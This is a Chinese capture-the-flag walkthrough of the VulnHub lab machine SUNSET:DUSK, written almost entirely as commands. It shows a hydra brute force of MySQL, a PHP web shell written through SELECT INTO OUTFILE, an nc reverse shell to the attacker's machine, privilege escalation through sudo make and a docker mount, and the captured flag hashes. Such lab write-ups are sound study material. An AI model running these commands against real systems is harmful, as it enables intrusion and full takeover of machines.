PJzhang:vulnhub靶机sunset系列SUNSET:DUSK

猫宁~~~

 

地址：https://www.vulnhub.com/entry/sunset-dusk,404/

重点关注工具和思路。

nmap 192.168.43.0/24

靶机IP
192.168.43.200

21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy

nmap -A -p1-65535 192.168.43.200，关注各个系统服务的版本漏洞

访问http://192.168.43.200:8080/，http://192.168.43.200/

成功，账户密码root/password
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql

进入数据库
mysql -h 192.168.43.200 -u root -P 3306 -p

select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;

http://192.168.43.200:8080/中可以看到muma.php，所在目录是/var/tmp

http://192.168.43.200:8080/muma.php?cmd=id

http://192.168.43.200:8080/raj.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444

nc -e /bin/bash 192.168.43.154 4444

攻击机nc -lvnp 4444

获得shell
python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
提权到dusk用户
sudo -u dusk make --eval=$'x:\n\t'/bin/bash

家目录
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b

docker images
docker pull alpine
docker run -v /:/mnt -it alpine
获取了root权限

cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e